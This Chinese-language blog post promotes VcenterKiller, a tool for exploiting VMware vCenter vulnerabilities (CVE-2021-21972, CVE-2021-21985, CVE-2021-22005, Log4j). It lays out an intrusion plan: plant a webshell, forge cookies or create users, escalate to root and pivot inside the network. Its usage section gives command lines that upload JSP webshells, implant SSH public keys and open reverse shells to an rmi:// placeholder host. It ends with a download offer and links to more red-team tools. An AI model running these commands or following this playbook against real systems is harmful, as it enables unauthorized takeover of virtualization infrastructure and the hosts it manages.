查看原文
其他

VMware vCenter漏洞综合利用Tools(附下载)

WIN哥 WIN哥学安全 2023-04-23
本篇介绍VMware vCenter利用工具。下篇介绍一篇VMware vCenter实战分析。欢迎阅读。

01


Vcenter是什么?



Vcenter一般指VMware vCenter Server,其提供了一个可伸缩、可扩展的平台,为虚拟化管理奠定了基础,可集中管理VMware vSphere环境,与其他管理平台相比,极大地提高了IT管理员对虚拟环境的控制,Vcenter可以使管理员从一个位置深入了解虚拟基础架构的集群、主机、虚拟机、存储、客户操作系统和其他关键组件等所有信息。

利用思路

  • Vcenter利用点非常多,获取权限之后危害较大,并且web特征明显,内网中很容易被发现。

  • 发现之后,查看Vcenter版本信息,确定存在的漏洞,通过漏洞获取webshell。

  • 测试权限,如果权限为root,进行伪造cookie或者创建用户操作获取web权限,进入vCenter后台获取更多机器的权限,尽可能的滚雪球扩大战果,如果权限为vsphere-ui,则查看版本是否存在条件提权,存在条件提权就提权到root权限,重复root权限操作。如果不存在条件提权,就尽可能的从当前机器中记录数据,以此机器作为跳板机进行内网漫游。

01


VcenterKiller是什么?


它是什么

一款针对Vcenter(暂时)的综合验证工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-2205,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测和验证。

它的定位

一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出。

为什么用GO,因为Python写起来方便但是用起来很蛋疼,各种依赖库,编译吧体积太大,C#没法跨平台,写到一半扔了。

使用方法

go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j./main.exe -u https://192.168.1.1 -m log4center -t rshell -r rmi://xx.xx.xx.xx:1099/xx //get reverseshell


02


下载链接

后台回复“1007”获取下载地址

往期推荐

适用于 2022 年红队行动的所有免费红队工具和模拟工具包


再搞一个漏洞扫描工具,684个poc,支持mac,linux,win

两款Shiro反序列化漏洞利用Tools(附下载)


【限时资源】先知社区文章资源打包限时分享

一款漏洞检测工具(460个poc)可使用fofa采集自动化

Gxby(带1288poc后台回复0926)

Android渗透工具(建议收藏)


web安全手册(红队安全技能栈-下载)


OAExploit一款基于OA产品的一键扫描工具




2个版本GUI_Tools的更新(V1.0魔改版&单身贵族版)

红队渗透下的入口权限快速获取

【宝藏】全网优秀攻防工具集成项目


欢迎关注,领取资料↓↓↓ 


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存